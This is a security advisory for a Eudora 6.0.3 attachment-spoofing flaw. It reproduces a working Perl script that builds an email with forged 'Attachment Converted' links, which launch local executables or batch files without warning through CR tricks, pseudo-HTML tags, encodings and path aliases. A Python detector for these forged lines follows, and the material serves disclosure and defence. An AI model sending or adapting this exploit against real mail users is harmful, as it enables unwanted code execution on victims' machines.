Eudora Attachment Spoof Exploit Revisited

Summary

Eudora is an advanced email client for Windows and Mac. A security bug that has been known for years is still present in the newest release of Eudora.

Credit:

The information has been provided by Paul Szabo.
The original article can be found at: https://securiteam.com/exploits/5FP0G15B5O.html


Details

Vulnerable Systems:
 * Eudora version 6.0.3

Exploit
#!/usr/bin/perl --

use MIME::Base64;

print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.0.3 on Windows spoof, LaunchProtect\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "\n";
print "This is a multi-part message in MIME format.\n";
print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

print "Pipe the output of this script into:   sendmail -i victim\n";

print "\nWith spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to).\n";

print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded
CR=\\x0d characters get converted internally into a NUL=\\x00 and ignored,
so we can spoof 'attachment converted' lines:\n";

print "\nThe following work fine (but are boring and/or put up warnings):\n";
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n";
print "(Note how JavaScript is done with IE, web with default browser Netscape)\n";
print "Attachment Converted\r: <A href=javascript:alert(%27hello%27)>hello.txt</a>\n";
print "Attachment Converted\r: <A href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>\n";
print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file.txt</a>\n";

print "\nIf we can guess the full path to the attach directory then can
change the name shown to anything we like, but get broken icon:\n";
print "Attachment Converted\r: <A href=H:/eudora/attach/calc>file.txt</a>\n";

print "\nCuteness value only:\n";
print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>\n";

print "\n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file</a>,
<a href='http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx'>http</a>
and
<a href='javascript:alert(\x27hello\x27)'>javascript</a>
references. Any way to exploit this?
</x-html>\n";

print "\n<x-rich>
Can also do RTF inclusions. Can this be abused?
</x-rich>\n";

print "\nThose <x-xyz></x-xyz> constructs allow spoofing
attachments easily, without embedded CR:\n\n";
print "HTML\n";
print "<x-html></x-html>Attachment Converted: \"xyz\"\n";
print "Rich\n";
print "<x-rich></x-rich>Attachment Converted: \"xyz\"\n";
print "Flowed\n";
print "<x-flowed></x-flowed>Attachment Converted: \"xyz\"\n";

print "\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"plain.txt\"\n";
print "Content-Transfer-Encoding: 7bit\n";
print "Content-Disposition: inline; filename=\"plain.txt\"\n";
print "\n";
print "Within a 'plain' attachment:\n";
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"qp.txt\"\n";
print "Content-Transfer-Encoding: quoted-printable\n";
print "Content-Disposition: inline; filename=\"qp.txt\"\n";
print "\n";
print "Within quoted-printable encoded parts still need the embedded CR:\n";
print "=41ttachment=20=43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"b64.txt\"\n";
print "Content-Transfer-Encoding: base64\n";
print "Content-Disposition: inline; filename=\"b64.txt\"\n";
print "\n";
# Literal newlines inside the string follow each \r, giving CR-LF line ends.
$z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r
without embedded CR (but line termination is CR-NL):\r
Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n";
print encode_base64($z);

print "\n--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

print "\n=====\n";

$X = "README"; $Y = "$X.bat";
print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
$z = "rem Funny joke\r\npause\r\n";
# pack("u", ...) uuencodes the body; "begin 600 NAME" / "`" / "end" frame it.
print "begin 600 $X\n", pack("u", $z), "`\nend\n";
print "\nand (in another message or) after some blurb so is scrolled off in
another screenful, also send $Y. Clicking on $X does not
get it any more (but gets $Y, with a LaunchProtect warning):\n";
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
print "begin 600 $Y\n", pack("u", $z), "`\nend\n";

print "\n=====\n";

print "
Eudora 6.0.3 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments pointing to an executable
stored elsewhere to run without warning:\n";
print "Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\n";
print "Attachment Converted\r: c:/winnt/system32/calc\n";

print "
Can be exploited if there is more than one way into attach: in my setup
H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n";
print "These elicit warnings:\n";
print "Attachment Converted\r: <a href=h:/eudora/attach/README>readme.txt</a>\n";
print "Attachment Converted\r: h:/eudora/attach/README\n";
print "Attachment Converted\r: \\README\n";
print "Attachment Converted\r: .\\README\n";
print "Attachment Converted\r: \\.\\README\n";
print "Attachment Converted\r:  \\README\n";
print "Attachment Converted\r: \\ \\README\n";
print "while these do the bad thing without warning:\n";
print "Attachment Converted\r: <a href=file://rome/home/eudora/attach/README>readme</a>\n";
print "Attachment Converted\r: //rome/home/eudora/attach/README\n";
print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n";

print "
For the default setup, Eudora knows that C:\\Program Files
and C:\\Progra~1 are the same thing:\n";
print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n";
print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n";
print "
and also knows that various UNC references:
\\\\localhost\\c...
\\\\127.0.0.1\\c...
\\\\BIOSNAME\\c...
\\\\DNSNAME\\c...
\\\\IP\\c...
\\\\?\\c...
\\\\c...
...c:\\progr...
...c\\progr...
...c:progr...
...program files\\...
...progra~1\\...
or even
.\\NoSuchDir\\..\\README
//c|\\Program Files\\qualcomm\\eudora\\attach\\README
\\\\c|\\Program Files\\qualcomm\\eudora\\attach\\README
res://c:\\Program Files\\qualcomm\\eudora\\attach\\README
res:\\\\c:\\Program Files\\qualcomm\\eudora\\attach\\README
shell:Fonts\\..\\..\\Program Files\\qualcomm\\eudora\\attach\\README
%ProgramFiles%\\qualcomm\\eudora\\attach\\README
%windir%\\..\\Program Files\\qualcomm\\eudora\\attach\\README
are all the same thing...
";

print "\n";
print "\n--zzz--\n";
print "\n";
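A defender-side check for the forged lines this script produces, added here as an example and not part of the advisory or of Paul Szabo's script. It decodes every text part of a message (7bit, quoted-printable or base64, the encodings the script exercises) and reports any line that Eudora would render as an attachment link; the sample message is constructed for the demonstration.

```python
import base64
import email
import re
from email import policy

# Eudora shows a body line that starts with "Attachment Converted:" as a
# clickable link to the named file. The advisory forges such lines in three
# ways inside decoded text parts: a CR embedded before the colon, an empty
# <x-html>/<x-rich>/<x-flowed> construct in front, and the bare marker
# hidden by base64 or quoted-printable transfer encoding.
SPOOF_RE = re.compile(
    r"^(?:<x-(?:html|rich|flowed)>\s*</x-(?:html|rich|flowed)>)?[ \t]*"
    r"Attachment\s+Converted[\r\x00]*:",
    re.IGNORECASE | re.MULTILINE,
)

def find_spoofed_attachment_lines(raw_message: bytes) -> list[tuple[str, str]]:
    """Return (part label, offending line) for every forged marker.

    Each text/* part is decoded first, so the transfer encoding cannot hide
    the marker. Eudora writes this line locally and a sender never needs it,
    so any inbound occurrence is worth flagging or neutralising."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        body = part.get_content()  # undoes base64 / quoted-printable
        label = part.get_filename() or part.get_content_type()
        for m in SPOOF_RE.finditer(body):
            end = body.find("\n", m.end())
            line = body[m.start():None if end == -1 else end].rstrip("\r")
            hits.append((label, line.replace("\r", "\\r")))  # make CR visible
    return hits

# Constructed sample modelled on the advisory's message: a 7bit part with a
# CR-spoofed line and an <x-html></x-html> line, then a base64 part.
B64_BODY = base64.b64encode(b'benign line\r\nAttachment Converted: "c:\\x.exe"\r\n')
SAMPLE = (
    b'From: sender@example.test\r\nTo: victim@example.test\r\n'
    b'Subject: constructed sample\r\nMIME-Version: 1.0\r\n'
    b'Content-Type: multipart/mixed; boundary="zzz"\r\n\r\n'
    b'--zzz\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: 7bit\r\n\r\n'
    b'Hello, nothing to see.\r\n'
    b'Attachment Converted\r: "c:\\winnt\\system32\\calc.exe"\r\n'
    b'<x-html></x-html>Attachment Converted: "xyz"\r\n'
    b'--zzz\r\nContent-Type: text/plain; name="b64.txt"\r\n'
    b'Content-Transfer-Encoding: base64\r\n\r\n' + B64_BODY + b'\r\n'
    b'--zzz--\r\n'
)
```

Running `find_spoofed_attachment_lines(SAMPLE)` reports three lines: the two in the 7bit part and the one that base64 encoding had hidden.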
